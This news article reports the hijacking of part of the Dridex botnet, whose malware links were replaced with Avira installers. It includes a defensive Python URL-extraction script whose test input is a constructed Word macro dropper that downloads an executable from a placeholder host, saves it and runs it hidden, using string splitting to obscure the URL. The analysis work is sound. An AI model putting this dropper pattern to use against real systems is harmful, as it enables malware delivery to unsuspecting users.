Part of the Dridex botnet's distribution channel hacked by an unknown party who replaced the Trojan with Avira antivirus installers!
The Dridex botnet remains an active threat, even after a takedown attempt at the end of 2015.
The malicious code distributed by Dridex usually arrives in the form of spam messages carrying malicious attachments. The files used most often are Word documents with embedded malicious macros.
Once the victim opens the file, the macros download the malware from a remote server. Dridex installs a keylogger on infected computers and, using transparent redirects and web injects, intercepts credentials for banking websites.
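The download URL is the part of a macro dropper a defender most wants to recover, and the part the hackers described below changed. The following Python script is an added example written for this article, not code from Avira or from any Dridex sample: it takes VBA macro source, folds line continuations, decodes the string-building tricks commonly used to hide a URL (literal concatenation with `&`/`+` and `Chr()`/`ChrW()` calls), and reports every decoded string that is a URL together with the downloader-related API names the macro uses. The macro text is constructed for the example, and the `dl.example.invalid` host is a placeholder.

```python
import re

# Constructed sample VBA macro, written for this example (not a real Dridex sample).
# It follows the pattern the article describes: an AutoOpen macro that fetches an
# executable from a remote URL and runs it, with the URL split into pieces to
# defeat naive string searches. The host is a placeholder in the reserved .invalid TLD.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim h As Object, s As Object
    Dim u As String
    u = "ht" & "tp://dl.exam" & Chr(112) & "le.invalid/" & _
        Chr(105) & "nv.exe"
    Set h = CreateObject("MSXML2.XMLHTTP")
    h.Open "GET", u, False
    h.Send
    Set s = CreateObject("ADODB.Stream")
    s.Open
    s.Type = 1
    s.Write h.responseBody
    s.SaveToFile Environ("TEMP") & "\upd.exe", 2
    Shell Environ("TEMP") & "\upd.exe", vbHide
End Sub
'''

# One VBA string token: a quoted literal (with "" as an escaped quote) or a Chr()/ChrW() call.
_TOKEN = r'(?:"(?:[^"]|"")*"|Chr[Ww]?\(\s*\d+\s*\))'
# A string expression: tokens joined by the & or + concatenation operators.
_EXPR = re.compile(rf'{_TOKEN}(?:\s*[&+]\s*{_TOKEN})*', re.IGNORECASE)
_TOKEN_RE = re.compile(_TOKEN, re.IGNORECASE)
_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# API names a downloader macro typically needs. Any one of them is only a hint;
# several of them next to a decoded URL is a strong signal.
INDICATORS = (
    "AutoOpen", "Document_Open", "MSXML2.XMLHTTP", "URLDownloadToFile",
    "ADODB.Stream", "WScript.Shell", "Shell", "SaveToFile",
)


def _join_continuations(src: str) -> str:
    """Fold VBA line continuations (' _' at end of line) so each expression sits on one line."""
    return re.sub(r'\s+_\s*\r?\n\s*', ' ', src)


def decode_string_expr(expr: str) -> str:
    """Evaluate a concatenation of literals and Chr()/ChrW() calls to the string it builds."""
    out = []
    for tok in _TOKEN_RE.findall(expr):
        if tok.startswith('"'):
            out.append(tok[1:-1].replace('""', '"'))   # strip quotes, unescape ""
        else:
            out.append(chr(int(re.search(r'\d+', tok).group())))  # Chr(n) -> character
    return "".join(out)


def extract_urls(src: str) -> list[str]:
    """Return every URL the macro's string expressions decode to, in source order, deduplicated."""
    urls = []
    for m in _EXPR.finditer(_join_continuations(src)):
        s = decode_string_expr(m.group())
        if _URL_RE.match(s) and s not in urls:
            urls.append(s)
    return urls


def find_indicators(src: str) -> list[str]:
    """Return which downloader-related names appear in the macro (case-insensitive match)."""
    low = src.lower()
    return [name for name in INDICATORS if name.lower() in low]


def analyze_macro(src: str) -> dict:
    """Summarize what the macro would fetch and which capabilities it uses."""
    return {"urls": extract_urls(src), "indicators": find_indicators(src)}


if __name__ == "__main__":
    report = analyze_macro(SAMPLE_MACRO)
    for url in report["urls"]:
        print("download URL:", url)
    print("indicators:", ", ".join(report["indicators"]))
```

On the constructed sample the script recovers `http://dl.example.invalid/inv.exe` even though that string never appears verbatim in the macro. In practice the macro source would first be pulled out of the document's VBA project with a tool such as oletools' `olevba`; the decoder here deliberately handles only concatenation and `Chr()`, so a macro that builds its URL with other functions still shows up through its indicators but not through a decoded URL.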
But the recent hack of the botnet served a very different purpose.
"The malware download URL has been replaced with a link to an updated Avira antivirus installer," said Moritz Kroll, an Avira malware expert.
So instead of malware, the victims download a valid, signed copy of Avira's security software.
"We do not know exactly who did it and why - but we do have some theories," Kroll said.
One possible explanation is that a white-hat hacker managed to take over the botnet's control systems and changed the malicious URLs to Avira's.